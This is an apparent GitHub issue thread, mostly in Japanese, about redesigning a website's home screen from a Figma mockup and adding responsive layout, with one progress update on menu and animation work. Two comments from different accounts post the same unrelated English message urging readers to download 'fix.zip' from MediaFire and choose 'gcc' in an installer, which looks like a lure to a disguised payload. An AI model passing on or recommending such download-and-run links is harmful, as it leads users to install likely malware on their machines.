### ISSUE TITLE
ホーム画面のデザイン修正

### ISSUE THREAD

**Issue by sanpicule** [sanpicule/KikaraHP#54]
・変更したデザイン通りに修正
https://www.figma.com/design/JqM0gzw8JcOShFJYFPjz0s/Kikara-HP?node-id=667-1146&t=uPieLfEV2gv1zhz8-0 
・レスポンシブデザインも同時に実装

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by toshikifujiyoshi** [comment]
PC看板部分のデザイン改修、ハンバーガーメニューのデザイン改修を実装済み
今後の優先順位としては
１、レスポンシブ対応、プロフィールのデザイン改修
２，アニメーションの追加（framer-motionにて実装）
３，既存アニメーションをframer-motionに置き換える
を予定しております
